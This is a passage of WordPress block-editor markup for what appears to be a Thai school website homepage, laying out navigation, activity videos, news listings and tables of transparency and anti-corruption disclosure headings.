{\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_987966-10\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_987966-10\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_7bc053-2c\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_3a11d0-a6\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_3a11d0-a6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_138813-93\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_138813-93\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_9f83a7-ce\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_9f83a7-ce\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7fabbb-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7fabbb-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_1d2215-71\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_1d2215-71\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_7e7dd7-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_7e7dd7-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3078a3-3c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3078a3-3c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_dadb4c-b7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_dadb4c-b7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_24abce-04\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_24abce-04\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-48e80028 gb-button-text\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></span>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:generateblocks/grid {\"uniqueId\":\"19bd4464\",\"columns\":2,\"horizontalGap\":20,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"2cef18b9\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":138} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/448905004_973201524597519_7994539186753533290_n-1.jpg\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุนทนภู่.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"66a01ab5\",\"isGrid\":true,\"gridId\":\"19bd4464\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:video {\"id\":142} -->\n<figure class=\"wp-block-video\"><video controls poster=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/Untitled.png\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/สุขาดี.mp4\"></video></figure>\n<!-- /wp:video -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 